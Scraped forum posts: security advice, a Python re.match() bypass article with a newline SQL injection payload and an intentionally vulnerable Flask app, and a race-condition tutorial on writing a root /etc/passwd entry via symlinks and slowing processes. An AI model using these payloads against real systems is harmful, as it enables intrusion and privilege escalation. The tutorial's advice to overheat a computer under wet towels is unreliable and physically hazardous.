Nytro
Administrator
  1. There isn't much you can do if the program's functionality doesn't allow activating the license. You can try setting the clock back a few years, but the chances of that working are slim (you'd set it back afterwards). Wouldn't a newer version of the program do the job? Maybe you can talk to the vendor and have them give you a new one.
  2. If you want to run some crypto bot or other, I don't think you need to worry that the NSA has planted a backdoor there; they won't care unless you're a hugely important person on the world stage (e.g. the director of a nuclear plant in Iran). Securing it is fairly simple:
     1. Update as often as possible
     2. Don't install every piece of junk
     3. Remove the things you don't need, such as services you don't use
     4. Leave only SSH, with key-based auth, and you're done
     5. There is plenty more hardening you could do, but you don't really need it
     If you want, you can audit a Linux distribution and be certain it has no backdoor; it will only take a few thousand years:
     1. Take all the source code and compile it
     2. Do a reproducible build if possible; if not, diff what your distribution ships against what you compiled
     3. Check all the differences (there will be some) caused by patches, modifications, or configuration
     4. Review all the source code, from the kernel to every installed program, and make sure none of it has a backdoor
     5. Bonus: hunt for vulnerabilities while you're at it
     Now, more seriously, there isn't much that you, one person, can do individually. If a few thousand people banded together it could be done, but it would still take months or even years (with no updates landing in the meantime). As for that distribution, I haven't heard of it; why did you choose it? Why not something "classic": Debian, CentOS, Ubuntu, Kali, etc.?
  3. Registry Explorer
     Replacement for the Windows built-in Regedit.exe tool. Improvements over that tool include:
     • Show real Registry (not just the standard one)
     • Sort list view by any column
     • Key icons for hives, inaccessible keys, and links
     • Key details: last write time and number of keys/values
     • Displays MUI and REG_EXPAND_SZ expanded values
     • Full search (Find All / Ctrl+Shift+F)
     • Enhanced hex editor for binary values
     • Undo/redo
     • Copy/paste of keys/values
     • Optionally replace RegEdit
     • more to come!
     Build instructions: build the solution file with Visual Studio 2022 preview. It can be built with Visual Studio 2019 as well (change the toolset to v142).
     Source: https://github.com/zodiacon/RegExp
  4. A Python Regular Expression Bypass Technique
     One of the most common ways to check a user's input is to test it against a regular expression. The Python module re provides easy and very powerful functions to check whether a particular string matches a given regular expression (or whether a given regular expression matches a particular string, which comes down to the same thing). Sometimes the functions in Python's re are misused or not very well understood by developers, and when you see this it can be possible to bypass weak input validation functions.
     TL;DR: using Python's re.match() function to validate user input can lead to a bypass, because it only matches at the beginning of the string and not at the beginning of each line. So, by converting a payload to multiline, the second line is ignored by the function. This means that a weak validation function that prevents special characters in a value (for example id=123) could be bypassed with something like id=123\n'+OR+1=1--.
     In this article I'll show you an example of bad usage of the re.match() function.
     [from search() vs. match()] Python offers two different primitive operations based on regular expressions: re.match() checks for a match only at the beginning of the string, while re.search() checks for a match anywhere in the string (this is what Perl does by default). For example:

     >>> re.match("c", "abcdef")    # No match
     >>> re.search("c", "abcdef")   # Match
     <re.Match object; span=(2, 3), match='c'>

     Regular expressions beginning with '^' can be used with search() to restrict the match to the beginning of the string:

     >>> re.match("c", "abcdef")    # No match
     >>> re.search("^c", "abcdef")  # No match
     >>> re.search("^a", "abcdef")  # Match
     <re.Match object; span=(0, 1), match='a'>

     As you can see, the first re.match didn't match because of implicit anchors. Anchors do not match any character at all. Instead, they match a position before, after, or between characters.
     They can be used to “anchor” the regex match at a certain position (https://www.regular-expressions.info/anchors.html).
     Input Validation using re.match()
     Let's say I've got a Python Flask web application that is vulnerable to SQL injection. If I send an HTTP request to /news with an article id number in the id argument and a category name in the category argument, it returns the content of that article. For example:

      1 from flask import Flask
      2 from flask import request
      3 import re
      4
      5 app = Flask(__name__)
      6
      7 def is_valid_input(input):
      8     m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE)
      9     if m is not None:
     10         return False
     11     return True
     12
     13 @app.route('/news', methods=['GET', 'POST'])
     14 def news():
     15     if request.method == 'POST':
     16         if "id" in request.form:
     17             if "category" in request.form:
     18                 if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]):
     19                     return f"OK: {request.form['category']}/{request.form['id']}"
     20                 else:
     21                     return f"Invalid value: {request.form['category']}/{request.form['id']}", 403
     22             else:
     23                 return "No category parameter sent."
     24         else:
     25             return "No id parameter sent."

     By sending a request with id=123 and category=financial, the application replies with a "200 OK" status code and "OK: financial/123" as the response body. As I said, the id argument is vulnerable to SQL injection, so the developer has fixed it by creating a function that validates the user's input on both arguments (id and category) and prevents sending characters like single and double quotes, or strings like "select" or "union".
     As you can see, this webapp checks the user's input with the is_valid_input function at line 7:

     def is_valid_input(input):
         m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE)
         if m is not None:
             return False
         return True

     The code above means: "if the value of any input contains a double quote, single quote, semicolon, or equals character, or any of the strings 'select', 'union', 'from', 'where', then discard it". Let's try it: by injecting SQL syntax into the value of the id argument, the webapp returns a 403 Forbidden status with "Invalid value" as the response body. This is thanks to the validation function, which matches invalid characters in my payload such as the single quote and equals sign.
     Input Validation Bypass
     From the re module documentation, about the re.match() function: "... even in MULTILINE mode, re.match() will only match at the beginning of the string and not at the beginning of each line. If you want to locate a match anywhere in string, use search() instead (see also search() vs. match())."
     So, to bypass this kind of input validation we just need to convert the SQL injection payload from single line to multiline by adding a \n between the numeric value and the SQL syntax. (If the question is "can SQL have a newline inside a SELECT?", the answer is: yes, it can.) Let's do it on the vulnerable webapp: I just put a \n (not CRLF \r\n) after the id value and then started my SQL injection. The validation function only validates the first line, so I bypassed it.
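The bypass can be reproduced outside the webapp with nothing but the validation function itself. A small sketch of the behaviour just described (is_valid_input is the article's function; is_valid_input_search is my name for the re.search() variant):

```python
import re

def is_valid_input(value):
    # The flawed deny-list from the article: re.match() anchors at the
    # start of the string, and '.' does not match a newline.
    m = re.match(r'.*(["\';=]|select|union|from|where).*', value, re.IGNORECASE)
    return m is None

# A single-line payload is caught...
print(is_valid_input("123' OR 1=1--"))       # False: blocked
# ...but pushing the SQL onto a second line slips straight through,
# because re.match() only ever sees the first line.
print(is_valid_input("123\n' OR 1=1--"))     # True: bypass

# Swapping re.match() for re.search() closes this particular hole,
# since re.search() scans the entire string:
def is_valid_input_search(value):
    m = re.search(r'["\';=]|select|union|from|where', value, re.IGNORECASE)
    return m is None

print(is_valid_input_search("123\n' OR 1=1--"))  # False: blocked

# An allow-list is stricter still. Note that re.fullmatch() (or \A...\Z)
# is safer than ^...$, because '$' also matches just before a trailing newline:
print(bool(re.match(r"^[0-9]+$", "123\n")))   # True: the '$' gotcha
print(bool(re.fullmatch(r"[0-9]+", "123\n"))) # False: rejected
```

The last two variants correspond to the remediations discussed at the end of the article.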
     Using curl:

     curl -s -d "id=123%0a'+OR+1=1--&category=test" 'http://localhost:5000/news'
     OK: test/123

     Run it in your Lab
     First, grab the vulnerable Flask webapp source code (app.py):

     from flask import Flask
     from flask import request
     import re

     app = Flask(__name__)

     def is_valid_input(input):
         m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE)
         if m is not None:
             return False
         return True

     @app.route('/news', methods=['GET', 'POST'])
     def news():
         if request.method == 'POST':
             if "id" in request.form:
                 if "category" in request.form:
                     if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]):
                         return f"OK: {request.form['category']}/{request.form['id']}"
                     else:
                         return f"Invalid value: {request.form['category']}/{request.form['id']}", 403
                 else:
                     return "No category parameter sent."
             else:
                 return "No id parameter sent."

     then start the Flask webserver with:

     flask run

     Remediation
     The first option is to do positive validation instead of negative validation. Don't create a deny-list of "not allowed words" or "not allowed characters"; check for the expected value format instead. For example, id=123 can be validated with ^[0-9]+$.
     The second option is to use re.search() instead of re.match(), which checks the whole value and not just the first line.
     Third option: don't create your own input validation function; try to find a widely used and maintained library that does it for you.
     Follow
     If you liked this post, follow me on Twitter to keep in touch! https://twitter.com/AndreaTheMiddle
     Source: https://www.secjuice.com/python-re-match-bypass-technique/
  5. Winning the race: Signals, symlinks, and TOC/TOU
     Date: 23rd Jun 2021 | Author: uid0
     Introduction:
     Before we dive right into things, a few bits of advice: some programming knowledge, an understanding of what symbolic linking is within *nix and how it works, and an understanding of how multi-threading and signal handlers work will all benefit readers trying to follow the concepts covered here. If you can't code, don't worry; I'm sure you'll still be able to grasp the concepts, but prior programming knowledge will give you a deeper understanding of how this actually works. It won't kill you to read up on the subjects I just mentioned, and by doing so you will understand this tutorial a lot more easily. Ideally, if you understand C/C++ and assembly language, you should be able to pick up the concept of a practical (s/practical/exploitable) race condition bug relatively easily. Knowing your way around a debugger will also help.
     Not all race conditions are vulnerabilities, but many race conditions can lead to vulnerabilities. That being said, when vulnerabilities do arise as a result of race condition bugs, they can be extremely serious. There have been cases in the past where race condition flaws have affected national critical infrastructure, in one case even directly contributing to the deaths of multiple people (no kidding!). Generally, within multi-threading, race conditions aren't an issue in terms of exploitability, but rather an issue of the intended program flow not going as planned (note "generally"; there are exceptions where this can be used for exploitation rather than being a mere design issue). Anyway, before getting into specific kinds of race condition bugs, it should be noted that these bugs can exist in anything from a low-level Linux application to a multi-threaded relational DBMS implementation.
     In terms of paradigm, if your code is purely functional then race conditions will not occur (I guess that use of terminology is interchangeable, since code that suffers from race condition flaws lacks functionality in the non-paradigm sense too). So, what exactly are race conditions?
     Let's take a moment to sit back and enter the land of imagination. For the sake of this post, let's pretend you're not a fat nerd sitting in your Mom's basement living off of beer and tendies while making sweet sweet love to your anime waifu pillow. Let's imagine, just for one moment, that you're someone else. You're not just any old someone, no. You're someone who does something important. You're a world-class athlete. You've spent the last 4 years training non-stop for the 100m sprint, and you are certain you are going to win the Gold Medal this year. The time finally comes: you are ready to race. During the sprint you're neck-and-neck with Usain Bolt, both inches away from the finish line. By sheer chance, you both pass over the finish line at the exact same moment. The judges replay the footage in slow motion to see who crossed first, and unbelievably, you both passed the finish line at the exact same moment, down to the very nanosecond! Now the judges have a problem. Who wins Gold? You? Usain Bolt? The runner-up who crossed the line right after you two? What if nobody wins? What if you're both given Gold, decreasing the subjective value of the medal? What if the judges call off the event entirely? What if they demand a re-match? What if a black hole suddenly spawns in the Olympic arena and causes the entire solar system to implode? Who the hell knows, right? Well, welcome to the wild and wacky world of race conditions!
     This is Part One of a three-part series diving into the subject of race conditions; there's absolutely no way I can cover this whole subject in three blog posts. Try three books, maybe!
     Race conditions are a colossally huge subject with a wide variety of security implications, ranging from weird behaviour that poses no risk at all, to crashing a server, to full-blown remote command execution! Due to the sheer size of this topic, I suggest doing research in your own time between reading each part of this tutorial series. While at first it might seem intimidating, this is actually a very simple concept to grasp (exploiting it, on the other hand, is a bit more hit and miss, but I'll get into that later). Race conditions stem from novice developers assuming that their code will execute in a linear fashion, or from developers implementing multi-threading in an insecure manner. If their program then attempts to perform two or more operations at the same time, changes within the code flow of the program can end with undesirable results (or desirable, depending on whether you're asking the attacker or the victim!). It should also be noted (as stated before) that race conditions aren't necessarily always a security risk; in some cases they just cause unexpected behaviour within the program flow while leading to no actual risk. Race conditions can occur in many different contexts, even within basic electronics (and biology! Race conditions have been observed within the brains of live rats). I will be covering race conditions from an exploitation standpoint, mainly race conditions within web applications or within vulnerable C programs. The basic premise of a race condition bug is that two threads "race" against each other, allowing the winner of said race to manipulate the control flow of the vulnerable application. I'll touch lightly upon race conditions in multi-threaded applications and give some brief examples, but this post will mainly focus on races resulting from signal handling, faulty access checks, and symlink tricks.
     In addition to that, I'll give some examples of how this class of bugs can be abused within web applications. Race conditions cover such a broad spectrum that I simply cannot discuss all of it within one blog post, so I'll give a quick overview of the basics, which hopefully you can build upon with your own research. To give you a simpler analogy of what a race condition is, imagine you have online banking with a banking platform. Let's assume you open two separate browser tabs at once, both with the payment page loaded, and you set up both tabs so that you're ready to make a payment to another bank account. If you were to then click the button to make the payment in both tabs at identical times, it could register that only one payment had been made, when in reality the payment had been made twice but the money for only one of the payments had been deducted from your bank balance. This is a very basic analogy of how a race condition could take place, although it is highly unlikely to ever happen in a real-world scenario.
     I'm going to demonstrate some code snippets to explain this, in order to show the different kinds of races that are possible, and give examples in various languages, but I'll start with C-inspired pseudo-code. The reason I give the first example in C is that race conditions tend to be very common within vulnerable C applications. Specifically, you should be looking for the signal.h header, as this is generally a good indicator of a potential race condition bug being present (within issues regarding signal handling, at least). Another good indicator is access checks being present for files, as this can often lead to symlink races taking place (I will demonstrate this shortly). I will give other examples in other languages, and explain context-specific race condition bugs associated with such languages.
     While the code above is clearly not a working example, it lets me illustrate the concept of race conditions. Let's assume an attacker sends two operations to the program at the same time, and the code flow states that, if permitted, the specified function is executed. If timed correctly, an attacker could arrange for something to be permitted at the time of check while no longer being permitted at the time of use (this is a TOC/TOU race, meaning "Time of Check / Time of Use"). So, for example, we can assume that the following test is being run:

     if (something_is_permitted) // check if permitted

     The condition for the if statement is met and the code flow continues in the intended order, but by the time the function gets called the state has changed, and an action that should no longer be permitted still gets executed:

     doThis();

     This results in unintended program flow, and depending on the nature of the code, it could allow an attacker to bypass access controls, escalate privileges, cause a denial of service, etc. The impact of race condition bugs can vary greatly, ranging from a petty nuisance to critical exploits resulting in the likes of remote root. I'll begin by describing various types of race conditions and methods of triggering them, before moving on to some real-world examples of race conditions and an explanation of how they can be tested for within potentially vulnerable web applications. When most people think of race conditions, they imagine them to be something very fast-paced, and expect that the timing required to execute a TOC/TOU race must be extremely precise. While this is often the case, it is not always the case.
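Before moving on, the check/use gap just described can be made concrete with a minimal Python sketch. The names guarded_action and race_window are mine, not from the article; the injected hook stands in for whatever timing trick lets the attacker act between the check and the use:

```python
# A minimal TOC/TOU sketch: the permission is checked, the world changes,
# and the action still runs based on the stale result of the check.
state = {"permitted": True, "executed": False}

def guarded_action(race_window=lambda: None):
    if state["permitted"]:           # Time of Check
        race_window()                # the attack window between check and use
        state["executed"] = True     # Time of Use: acts on stale information

def attacker():
    # The attacker wins the race: by the time the action runs,
    # it is no longer permitted.
    state["permitted"] = False

guarded_action(race_window=attacker)
print(state)   # {'permitted': False, 'executed': True}
```

In a real target nobody hands you a callback; the window is opened by scheduling, latency, or the slow-down tricks discussed later in this post. The hook only makes the interleaving deterministic for illustration.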
     Consider the following example of a "slow-paced" race condition bug:
     • There exists a social-networking application where users have the ability to edit their profile
     • A user clicks the "edit profile" button and it opens the webpage allowing them to make edits
     • The user then goes AFK (Away From Keyboard)
     • The administrator finds an unrelated vulnerability in the profile editing section of the website and, as a result, locks down the edit functionality so that users can no longer edit their profiles
     • The user returns, and still has the profile editing page open in a browser tab
     • Despite new users not being able to access the "edit profile" page, this user already has the page open and can continue to make edits despite the restriction put in place by the administrator
     Race conditions can also take place as a result of latency within networks. Take an IRC network, for example: assume there is a hub and two linked nodes. Bob wants to register the channel #hax, yet Alice also wants to register the same channel. Consider the following:
     • Bob connects to IRC via node #1
     • Alice connects to IRC via node #2
     • Bob runs /join #hax
     • Alice runs /join #hax
     • Both of these commands are run from separate nodes at around the same time
     • Bob becomes an operator of #hax
     • Alice becomes an operator of #hax
     The reason for this is that, due to network latency, node #1 would not have time to send a signal to node #2 alerting it that the services daemon has already assigned operator status to another user on the same network.
     (PROTIP: When testing local desktop applications for race conditions (a compiled binary, for example), use something like GDB or OllyDbg to set a breakpoint between TOC and TOU within the binary you are debugging. Execute your code from the breakpoint and take note of the results in order to determine any potential security risk, or lack thereof. This is for confirmation of the bug only, and not for actual exploitation. As the saying goes, PoC||GTFO.
     This rings especially true with race conditions, considering some of them are just bugs or glitches or whatever you wanna call them, as opposed to viable exploits with real attack value. If you cannot demonstrate impact, you probably should not report it.)
     Symlinks and Flawed Access Checks:
     Using symlinks to trigger race conditions is a relatively common method, and here I will give a working example. The example shows how a symlink race can be used to exploit a badly implemented access check in C/C++, which would allow an attacker to escalate privileges and get root on a server (assuming the server ran a program vulnerable in this manner). It should be noted that while writing to /etc/passwd in the manner I'm about to demonstrate will not work on newer operating systems, these methods can still be used to obtain read (or sometimes write) permissions on root-owned files that generally would not be accessible from a regular user account. This method assumes that the program in question is being run with setuid access rights. The intended purpose of the program is to check whether you have permission to write to a specific directory (via an access(); check); if you have permission, it writes your input to the file of your choice. If you don't have permission, the access(); check is intended to fail, indicating that you're attempting to write to a directory or file which you lack the permission to write to. For example, the /tmp directory is world-writeable, whereas a directory such as /etc requires additional permissions. The goal of an attacker here is to abuse symbolic linking to trick the program into thinking it is writing to /tmp, where it has permission, when in fact it is writing to /etc, where it lacks permission. Modern Linux distributions (and modern countermeasures implemented in languages such as C) have ways of attempting to mitigate such an attack.
     For example, the POSIX C stdlib offers the mkstemp(); function, as opposed to fwrite(); or fopen();, for creating temporary files, and correspondingly mktemp(1) allows for the creation of temporary files on *nix-based systems. Another attempted mitigation on *nix-based systems is the O_NOFOLLOW flag for open() calls; the purpose of this flag is to prevent a file from being opened through a symbolic link. Take a look at the following vulnerable code (this is a race condition between the original program and a malicious one): an example suid program vulnerable to a typical TOC/TOU symlink race condition by means of an insufficient access check. I will be compiling and running this from my (non-root) user account. First, I will demonstrate this using a debugger (GDB, although others such as OllyDbg will do too), because it allows you to pause the execution of the program, making the race condition easier to hit; in a real exploitation scenario you would need to trigger the race condition naturally, which I will demonstrate next. First, disassemble the code using your debugger of choice. Now, set a breakpoint at fopen(); so we can demonstrate the race condition without actually having to go through the steps of triggering one naturally:

     break *0x80485ca

     Then replace the written file with a symbolic link. Now that you've paused the execution of the program through use of a breakpoint, resuming the program flow (after the symlink has been made) causes the access check to pass, meaning the program continues to run as intended and writes our input to a file that the user would normally not be permitted to write to.
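As a hedged stand-in for the vulnerable suid pattern just described, here is a Python sketch under stated assumptions: os.access(), like C's access(), answers for the real UID; a race_window hook replaces the actual timing battle; and everything runs in a scratch directory, with protected.txt standing in for /etc/passwd:

```python
import os
import tempfile

def vulnerable_write(path, data, race_window=lambda: None):
    """The check-then-use pattern from the article: access() then fopen()."""
    if os.access(path, os.W_OK):     # Time of Check: path looks writable
        race_window()                # attacker's window to swap in a symlink
        with open(path, "w") as f:   # Time of Use: open() follows the symlink
            f.write(data)
        return True
    return False

workdir = tempfile.mkdtemp()
innocent = os.path.join(workdir, "innocent.txt")    # a file we may write to
protected = os.path.join(workdir, "protected.txt")  # stand-in for /etc/passwd
with open(innocent, "w") as f:
    f.write("harmless\n")
with open(protected, "w") as f:
    f.write("root:x:0:0::/root:/bin/sh\n")

def attacker():
    # In the real suid scenario the check would fail on the protected file,
    # which is exactly why the swap happens only after the check has passed.
    os.remove(innocent)
    os.symlink(protected, innocent)

vulnerable_write(innocent, "raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh\n",
                 race_window=attacker)
print(open(protected).read())   # the "protected" file now holds our entry
```

The check is done against one file and the write lands on another; in the suid case, that other file is one your real UID could never have passed the check for.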
     Of course, using GDB or another debugger isn't possible in real-world scenarios, so you need something that will allow the race condition to take place naturally (instead of setting a breakpoint and pausing the program execution with a debugger to get the timing right). One way of doing this is by repeatedly performing two operations at the same time until the race condition is met. The following example shows how the access check in the vulnerable C program can be bypassed by two bash scripts running simultaneously. Once the race condition is successfully met, the access check is passed and a new entry is written to /etc/passwd.
     Script #1: this script runs repeatedly until the condition is met; that's why it re-executes itself within the while loop.
     Script #2: this script repeatedly attempts to make a symbolic link to /etc/passwd.
     After a while of both of these scripts running at the same time, the timing should eventually work out so that the symbolic link is made prior to completion of the access check, causing the access check to be bypassed and data to be written to a previously restricted file (/etc/passwd in this case). If all goes to plan, an attacker should be able to write a new root-privileged entry to /etc/passwd:

     raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh

     From here, they can simply use 'su' to authenticate as a root user with the new 'raceme' account they created by adding an entry to /etc/passwd. g0t r00t!!
     Race Conditions within Signal Handling:
     If you do not understand the concept of signal handlers within programming, now is probably a good time to become familiar with the subject, as it is one of the primary causes of race condition flaws.
     The most common occurrence of race conditions within signal handlers is when the same function installed as a signal handler is used to handle multiple different signals, and those different signals invoke the same signal handling function within a short time-frame of each other (hence the race condition). "Non-reentrant" signal handlers are the primary culprit that makes signal-based races an issue. If you're unfamiliar with the concept of non-reentrancy within signal handling, then I really do suggest reading into the topic in depth, but if you're like me and have a TL;DR attitude and just wanna go hack the planet already, then I will offer a short and sweet explanation (the terminology alone is somewhat self-explanatory, in all honesty). If a function has been installed for signal handling, and that function either maintains internal state or calls another function that maintains internal state, then it's a non-reentrant function, and this means there is a higher probability of a race condition being possible. For an example demonstrating the exploitability of race condition bugs associated with signal handlers, I will be using the free(); function (associated with dynamic memory allocation in C/C++) to trigger a traditional and well-known application-security flaw referred to as a "double free". The following code example shows how an attacker could craft a specifically timed payload. If you're not spotting the common trend here: race conditions are all about timing. Generally attackers will have their payloads running concurrently in a for/while loop, or they'll create a ghetto-style "loop" of sorts by having payload1.sh repeatedly execute payload2.sh, which in turn will repeatedly execute payload1.sh, and so on.
     The reasoning for this is that in many contexts, for a race condition to be successful, the requests need to be made concurrently, sometimes down to the exact millisecond. Rather than executing the payload once and hoping for the one-in-a-million chance of getting the timing exactly right, it makes far more sense to use a loop to repeatedly execute the payload, as each iteration of the loop gives the attacker another chance of getting the timing right. Pair this with methods of slowing down the execution of certain processes, and the attacker has increased their window (the "window" here being the viable time in which the race condition can occur, allowing the attack to be carried out). With a TOC/TOU race, the "attack window" is the time between the check taking place ("TOC", Time of Check) and the time when the action occurs ("TOU", Time of Use), before the check is carried out again. The "attack window" in this instance is the time frame in which the check says the action is permitted, which for a very short period (or "window") it is... up until the iteration wherein the next check occurs and the action is no longer permitted, meaning the window has closed. In short, winning a race comes down to:
     • Maximising the window in which the attack can be carried out by slowing down particular aspects of program/process execution (I cover methods of doing this in a chapter here)
     • Making as many concurrent attempts at triggering the race as possible within the time-frame dictated by the length of your attack window. Use multiple threads where possible.
     • Testing manually with a debugger, by setting a breakpoint between TOC and TOU
     • Having lots of processing power available to make as many concurrent requests as possible during your attack window (while using the methods I describe to slow down other elements of process execution at the same time)
     Below you can find an example of a race condition present via signal handling, with the triggering of a double free as a proof of concept. This code example uses the same signal handler function for multiple signals; the handler is non-reentrant and makes use of shared state. The function in question calls free();, and an attacker could send two different signals to the same signal handler at the same time, resulting in memory corruption as a direct result of the race condition itself. If you have experience with C/C++ and dynamic memory allocation, then you're probably aware of the issues posed by calling free(); twice with the same argument. For those who are not aware, this is known as a "double free bug", and it results in the program's memory structures becoming corrupted, which can cause a multitude of problems ranging from segfaults and crashes to arbitrary code execution, the latter when the attacker is able to control the data written into the doubly-allocated memory region, resulting in a buffer overflow. The RCE is triggered by the overflow, which in turn is triggered by the double free; the double free itself is triggered as a result of a race condition occurring due to two separate signals being sent to the signal handler that calls free();, which, without getting overly technical, essentially makes malloc(); throw a hissy-fit and poop its pants.
     The following code demonstrates this issue:

     #include <stdio.h>
     #include <vulnerable.lol>
     #define RACE_CONDITION LOL

     void vuln(int pwn)
     {
         // some lame program
         free(globvar);
         free(globvar2); // double free
     }

     int main(int argc, char* argv[])
     {
         // overflowz and code exec
         signal(SIGHUP, vuln);
         signal(SIGTERM, vuln);
         // all due to a pesky race condition
     }

     There are a number of reasons why signal handling can result in race conditions, although using the same function as a handler for two or more separate signals is one of the primary culprits. Here is a list of what could trigger a race condition via signal handling (from Mitre's CWE database):
     • Shared state (e.g. global data or static variables) that is accessible to both a signal handler and "regular" code
     • Shared state between a signal handler and other signal handlers
     • Use of non-reentrant functionality within a signal handler, which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution.
     • Association of the same signal handler function with multiple signals, which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses.
     • Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality
     • While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are no concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses.
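The "same handler, multiple signals, shared state" pattern from the list above can even be sketched in Python. The double free is simulated by releasing a shared buffer twice, since Python won't let you corrupt the real allocator; the names here are illustrative:

```python
import os
import signal
import time

resource = {"buf": bytearray(16)}    # shared state touched by the handler

def cleanup(signum, frame):
    # Non-reentrant "free": a second invocation finds the state already gone.
    if resource.pop("buf", None) is None:
        raise RuntimeError("double free")

# One handler installed for two different signals: the CWE pattern above.
signal.signal(signal.SIGUSR1, cleanup)
signal.signal(signal.SIGUSR2, cleanup)

os.kill(os.getpid(), signal.SIGUSR1)   # first "free" succeeds
time.sleep(0.05)                       # let the handler run
try:
    os.kill(os.getpid(), signal.SIGUSR2)
    time.sleep(0.05)
    outcome = "no corruption"
except RuntimeError:
    outcome = "double free"
print(outcome)
```

In C the analogous pattern ends in heap corruption rather than a tidy exception; the Python version only shows the control-flow shape: one non-reentrant cleanup routine, two signals, one shared resource.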
Out of everything just listed, the most common reasons are either that one signal handler is being used for multiple signals, or that two or more signals arrive in short enough succession of each other to fit the attack window of a TOCTOU race condition.

Methods of slowing down process execution:

Slowing down the execution of the program is almost vital to achieving race conditions more consistently, so here I will describe some of the common methods that can be used to do this. Some of these methods are outdated and will only work on older systems, but they are still worth including (especially if you're into CTFs).

Deep symlink nesting (as described above) is one old method that can be used to slow down program execution in order to aid race conditions. Another method is changing the value of the environment variable LD_DEBUG: setting this will result in debug output being sent to stderr, and if you then redirect stderr to a pipe, it can slow down or completely halt the setuid binary in question. To do this you would do something as follows:

LD_DEBUG=all some_program 2>&1

Usage of LD_DEBUG is somewhat outdated and no longer relevant for setuid binaries since glibc 2.3.4; that being said, it can still be used for some more esoteric bugs affecting legacy systems, and is also occasionally seen in solutions for CTFs.

Another method of slowing down program execution is lowering its scheduling priority through the nice or renice commands. Technically, this isn't slowing down the program execution as such; rather, it forces the Linux scheduler to allocate fewer time slices to the execution of the program, resulting in it running at a slower rate. It should also be noted that this can be achieved within code (rather than as a terminal command) through the nice() syscall. If the value passed to nice is negative, the process will run with higher priority.
If it is a positive value, then the process will run with lower priority. For example, the following call will cause the process to run at a ridiculously slow rate:

nice(19)

If you're familiar with writing Linux rootkits, then you may already be aware of these methods, but you can also use dynamic linker tricks via LD_PRELOAD to slow down the execution of processes. This can be done by hooking common functions such as malloc() or free(); once those functions are called within the vulnerable program, their execution will be slowed down accordingly.

One extremely trivial way of slowing down the execution of a program is to simply run it within a virtualized environment. If you're using a virtual machine, then there should be options available that allow you to limit the allocated CPU resources and RAM, letting you test the potentially vulnerable program in a more controlled environment where you can slow things down with ease and with a lot of control. This method will only work while testing for certain classes of race conditions.

One crude method of slowing down program/process execution in order to increase the chance of a race condition occurring is taking physical measures to overheat your computer, putting strain on its ability to perform computational tasks. Obviously, this is dangerous for the health of your device, so don't come crying to me if you wind up breaking your computer. There are many ways to do this, but the way I've seen it done (which, according to my crazy IRL hacker friend, is supposedly one of the safer methods of physically overheating your computer) is to simply wet a towel (or a bunch of towels) and wrap them around your device while making sure that the fan in particular is covered completely.

Deep symlinks can also be used to slow down the execution of the program, which is extremely valuable while attempting to exploit race conditions.
This is a very old and well-documented method, although these days it is practically useless (unless you're exploiting some old obscure system, or doing it for a CTF; I have seen this method utilized in CTF challenges before). Since Linux kernel 2.4.x, this method has been mitigated through a limit on the maximum number of symlink dereferences permitted during lookups, alongside limits on nesting depth. Despite this method being practically dead, I figured it's still worth covering because there are still some obscure cases where it can be utilized. Below is a script written by Rafal Wojtczuk demonstrating how this can be done (the example shown here can be found at Hacker's Hut):

This will cause the kernel to take a ridiculously long time to access a single file; here is the situation presented when the above script is executed:

drwxr-xr-x   2 aeb   4096 l
lrwxrwxrwx   1 aeb     53 l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services
lrwxrwxrwx   1 aeb     19 l1 -> l2/../l2/../l2/../l
lrwxrwxrwx   1 aeb     19 l2 -> l3/../l3/../l3/../l
lrwxrwxrwx   1 aeb     19 l3 -> l4/../l4/../l4/../l
lrwxrwxrwx   1 aeb     19 l4 -> l5/../l5/../l5/../l
drwxr-xr-x   2 aeb   4096 l5

The more parameters passed to the above bash script, the greater the depth of the symlinks, meaning it can take days or even weeks for the one process to finish. On older machines, this will result in application-level DoS. There are many other ways in which symbolic links can be abused in order to achieve race conditions; if you want to learn more about this then I'd suggest googling, as there's simply too much to explain in a single blog post.

Yet another method to slow down program execution is increasing the timer interrupt frequency in order to force more load onto the kernel. Timer interrupts within the Linux kernel have a long and extensive history, so I will not be going in-depth here.
In part 2 of this tutorial series you can expect many more advanced methods of slowing down process execution.

Final notes (and zero-days):

I intentionally chose to leave out a number of methods for testing/exploiting race condition bugs within web applications, although I'll be covering these in-depth in Part 2 of my race condition series. Meanwhile, I'll give you an overview of what you can expect from Part 2, while also leaving you two race condition 0day exploits to (ethically) play around with. The second part of my tutorial series on race conditions is going to have a primary emphasis on race conditions in webapps, which I touched upon lightly in this post. This post was my attempt at explaining what race conditions are, how they work, how to (ab)use them, and the implications of their existence in regards to bug bounty hunting. Now that I've covered what these bugs are and provided a few examples of real working exploits demonstrating that race conditions do indeed exist within webapps, I'm going to be spending most of part two covering the following three areas:

- More advanced techniques for identifying race conditions specifically within web applications, methods of bypassing protections against them, and lucrative sections of webapps to test in order to increase your chances of finding race condition bugs on a regular basis.
- More advanced (and several private) techniques used to slow down process execution, both within regular applications and within web applications (although mostly with emphasis on web applications, since that will be the primary theme of Part 2 of this series), and how to use some practical dynamic linker tricks by hooking (g)libc functions via LD_PRELOAD in userland/ring3, exactly like you would do with a rootkit, but with emphasis on using this to slow down program/process execution due to the added strain on hooked common functions, as opposed to using the dynamic linker for stealth-based hooking.
We are talking about exploiting race conditions here, not writing rootkits; so while some of these techniques are somewhat interchangeable, the methods I'll be sharing would be very inefficient for an LD_PRELOAD based rootkit, as they would make the victim's machine slow as shit. For maintaining persistence on a hacked box this is terrible, but for slowing down process execution to increase the odds of a race condition, this is great! You can expect me to expand upon dozens of methods of slowing down process execution to increase your odds of winning that race!

Finally, just like this first part of my race condition exploitation series, I'll be setting a trend by once again including two new zero-day exploits, both of which are race condition bugs.

Skype Race Condition 0day:

- Create a Skype group chat
- Add a bunch of people
